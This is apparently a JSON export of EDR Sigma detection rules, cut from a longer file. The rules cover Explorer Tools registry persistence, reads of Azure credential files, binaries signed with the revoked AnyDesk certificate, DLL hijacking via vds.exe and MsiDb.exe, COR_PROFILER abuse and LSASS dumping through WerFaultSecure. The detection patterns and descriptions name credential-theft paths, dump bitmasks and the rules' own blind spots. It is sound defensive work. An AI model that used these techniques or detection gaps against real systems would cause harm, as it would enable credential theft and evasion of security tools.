'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\RemovableStorage\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_legitimate_tools:\n Details|contains:\n - '%SystemRoot%\\system32\\sdclt.exe'\n - '%SystemRoot%\\System32\\cleanmgr.exe'\n - '%systemroot%\\system32\\dfrgui.exe'\n - '%systemroot%\\system32\\wbadmin.msc'\n\n exclusion_iobit:\n ProcessImage:\n - '?:\\Program Files\\iobit\\advanced systemcare\\ascinit.exe'\n - 
'?:\\Program Files (x86)\\iobit\\advanced systemcare\\ascinit.exe'\n Details:\n - '?:\\Program Files\\iobit\\advanced systemcare\\diskdefrag.exe'\n - '?:\\Program Files (x86)\\iobit\\advanced systemcare\\diskdefrag.exe'\n\n exclusion_defraggler:\n Details:\n - '?:\\program files\\defraggler\\defraggler64.exe'\n - '?:\\program files (x86)\\defraggler\\defraggler64.exe'\n - '?:\\program files\\utilitaires disque\\defraggler\\defraggler64.exe'\n - '?:\\program files (x86)\\utilitaires disque\\defraggler\\defraggler64.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "323dc7e5-08a1-429c-83b5-3df588b5a245",
"rule_name": "Possible Explorer Tools Persistence Added",
"rule_description": "Detects the modification of the Explorer Tools registry keys that list tools sometimes called by Windows.\nThis method is used as a means to achieve persistence by replacing one of the registry keys with a malicious payload.\nIt is recommended to analyze the process responsible for this registry modification to look for other malicious actions, as well as to analyze the file pointed to by the registry value.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3309bac8-843b-4a14-91b2-c7af144c1be8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625588Z",
"creation_date": "2026-03-23T11:45:34.625590Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625594Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_004_azure_config_read_macos.yml",
"content": "title: Suspicious Access to Azure Configuration File\nid: 3309bac8-843b-4a14-91b2-c7af144c1be8\ndescription: |\n Detects an attempt to read the contents of the Azure configuration file.\n Adversaries may attempt to read an Azure user's configuration file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Kind: 'read'\n Path:\n - '/Users/*/.azure/azureProfile.json'\n - '/Users/*/.azure/accessTokens.json'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n 
exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos 
Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_md5:\n Image: '/sbin/md5'\n\n exclusion_az_python:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'org.python.python'\n ProcessParentCommandLine|contains: '/opt/homebrew/bin/az '\n\n exclusion_jq:\n ProcessCommandLine: 'jq -r [.subscriptions[]|select(.isDefault==true)|.name][]|strings /Users/*/.azure/azureProfile.json'\n\n exclusion_claude:\n Image: '/opt/homebrew/Caskroom/claude-code/*/claude'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3309bac8-843b-4a14-91b2-c7af144c1be8",
"rule_name": "Suspicious Access to Azure Configuration File",
"rule_description": "Detects an attempt to read the contents of the Azure configuration file.\nAdversaries may attempt to read an Azure user's configuration file in order to gather credentials and move to cloud environments.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-12-22",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "331fa9c5-fe30-471e-ba82-51940fe0a2d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071261Z",
"creation_date": "2026-03-23T11:45:34.071263Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071267Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_anydesk_revoked_certificate.yml",
"content": "title: Process Executed Signed with AnyDesk Revoked Certificate\nid: 331fa9c5-fe30-471e-ba82-51940fe0a2d3\ndescription: |\n Detects the execution of a process signed using the AnyDesk revoked certificate.\n This certificate has been revoked after AnyDesk has confirmed that its production systems had been compromised following a cyber-attack in early 2024.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2024/02/20\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '9cd1ddb78ed05282353b20cdfe8fa0a4fb6c1ece'\n\n filter_anydesk:\n OriginalFileName: ''\n Description: 'AnyDesk'\n Company: 'AnyDesk Software GmbH'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n#level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "331fa9c5-fe30-471e-ba82-51940fe0a2d3",
"rule_name": "Process Executed Signed with AnyDesk Revoked Certificate",
"rule_description": "Detects the execution of a process signed with the revoked AnyDesk code-signing certificate.\nThis certificate was revoked after AnyDesk confirmed that its production systems had been compromised following a cyber-attack in early 2024.\nThe exclusion for legitimate AnyDesk binaries relies on PE version information (OriginalFileName, Description, Company), which whoever signs with the stolen certificate can set freely; verify the binary's hash against a known AnyDesk release rather than trusting these fields.\nIt is recommended to investigate the process to determine its legitimacy.\n",
"rule_creation_date": "2024-02-20",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "336d6115-e9ff-4197-b4b0-9fb7e4469941",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097696Z",
"creation_date": "2026-03-23T11:45:34.097698Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097702Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vds.yml",
"content": "title: DLL Hijacking via vds.exe\nid: 336d6115-e9ff-4197-b4b0-9fb7e4469941\ndescription: |\n Detects potential Windows DLL Hijacking via vds.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vds.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\bcd.dll'\n - '\\OSUNINST.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "336d6115-e9ff-4197-b4b0-9fb7e4469941",
"rule_name": "DLL Hijacking via vds.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vds.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nThe rule only fires when both vds.exe and the loaded library are located outside the Windows system directories (System32, SysWOW64, WinSxS) and the library is not signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "337d171f-6a34-4f7a-8369-d2c7d895322e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619359Z",
"creation_date": "2026-03-23T11:45:34.619361Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619365Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://offsec.almond.consulting/UAC-bypass-dotnet.html",
"https://redcanary.com/blog/cor_profiler-for-persistence/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_clr_profiler_process_environement_variable_powershell.yml",
"content": "title: .NET CLR Profiler Environment Variable Set via PowerShell\nid: 337d171f-6a34-4f7a-8369-d2c7d895322e\ndescription: |\n Detects a PowerShell script block referencing the COR_PROFILER or COR_PROFILER_PATH environment variables through the $env: drive, which can be used maliciously for UAC bypass, privilege escalation or persistence.\n COR_PROFILER and COR_PROFILER_PATH are environment variables associated with the .NET runtime profiling tools, used for legitimate debugging and optimization purposes.\n However, attackers may set these variables to make the .NET runtime load a malicious profiler library, leading to unintended system access levels.\n Note that the rule only matches the $env:COR_PROFILER form, so it also fires on reads of the variable, while assignments made via [Environment]::SetEnvironmentVariable or Set-Item are not covered.\n It is recommended to investigate the PowerShell script responsible for this action.\nreferences:\n - https://offsec.almond.consulting/UAC-bypass-dotnet.html\n - https://redcanary.com/blog/cor_profiler-for-persistence/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2022/12/23\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.012\n - attack.t1112\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains: '$env:COR_PROFILER'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "337d171f-6a34-4f7a-8369-d2c7d895322e",
"rule_name": ".NET CLR Profiler Environment Variable Set via PowerShell",
"rule_description": "Detects a PowerShell script block referencing the COR_PROFILER or COR_PROFILER_PATH environment variables through the $env: drive, which can be used maliciously for UAC bypass, privilege escalation or persistence.\nCOR_PROFILER and COR_PROFILER_PATH are environment variables associated with the .NET runtime profiling tools, used for legitimate debugging and optimization purposes.\nHowever, attackers may set these variables to make the .NET runtime load a malicious profiler library, leading to unintended system access levels.\nNote that the rule only matches the $env:COR_PROFILER form, so it also fires on reads of the variable, while assignments made via [Environment]::SetEnvironmentVariable or Set-Item are not covered.\nIt is recommended to investigate the PowerShell script responsible for this action.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "33c950a0-ccc5-4ddb-a153-b5550bf0d290",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097496Z",
"creation_date": "2026-03-23T11:45:34.097498Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097502Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msidb.yml",
"content": "title: DLL Hijacking via MsiDb.exe\nid: 33c950a0-ccc5-4ddb-a153-b5550bf0d290\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiDb.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiDb.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of 
filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "33c950a0-ccc5-4ddb-a153-b5550bf0d290",
"rule_name": "DLL Hijacking via MsiDb.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiDb.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nThe rule only fires when MsiDb.exe runs from outside the Windows system directories and the Windows Kits installation folders, the loaded msi.dll is located outside the system directories, and that library is not signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "33d2f606-2c1d-494f-9455-fba0a918e6eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086132Z",
"creation_date": "2026-03-23T11:45:34.086134Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086139Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html",
"https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html",
"https://attack.mitre.org/techniques/T1003/001/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1003_001_werfaultsecure_bitmask.yml",
"content": "title: Suspicious WerFaultSecure Execution\nid: 33d2f606-2c1d-494f-9455-fba0a918e6eb\ndescription: |\n Detects the execution of WerFaultSecure.exe with a suspicious dump type bitmask.\n WerFaultSecure is a Microsoft-signed binary used for Protected Process error reporting.\n This rule matches one specific dump type bitmask (decimal 268310, i.e. a full-memory dump with handle, thread and token information) that has so far only been observed in the WSASS and EDRFreeze hacktools; a tool passing a different bitmask or the same value in another form will not match.\n Attackers can abuse this legitimate tool's process memory dumping capability to dump protected processes such as LSASS or to freeze security software, bypassing security controls through Living off the Land techniques.\n It is recommended to investigate the parent process to determine the legitimacy of this action and to analyze the \"/pid\" argument to determine the criticality of the targeted process.\nreferences:\n - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n - https://attack.mitre.org/techniques/T1003/001/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2025/09/22\nmodified: 2025/10/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WSASS\n - classification.Windows.HackTool.EDRFreeze\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'WerFaultSecure.exe'\n CommandLine|contains: '/type 268310' # MiniDumpWithFullMemory | MiniDumpWithHandleData | MiniDumpScanMemory | MiniDumpWithFullMemoryInfo | MiniDumpWithThreadInfo | MiniDumpWithTokenInformation\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "33d2f606-2c1d-494f-9455-fba0a918e6eb",
"rule_name": "Suspicious WerFaultSecure Execution",
"rule_description": "Detects the execution of WerFaultSecure.exe with a suspicious dump type bitmask.\nWerFaultSecure is a Microsoft-signed binary used for Protected Process error reporting.\nThis rule matches one specific dump type bitmask (decimal 268310, i.e. a full-memory dump with handle, thread and token information) that has so far only been observed in the WSASS and EDRFreeze hacktools; a tool passing a different bitmask or the same value in another form will not match.\nAttackers can abuse this legitimate tool's process memory dumping capability to dump protected processes such as LSASS or to freeze security software, bypassing security controls through Living off the Land techniques.\nIt is recommended to investigate the parent process to determine the legitimacy of this action and to analyze the \"/pid\" argument to determine the criticality of the targeted process.\n",
"rule_creation_date": "2025-09-22",
"rule_modified_date": "2025-10-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "33eb8e8a-ac3d-4882-a33c-a06936e7ac1c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
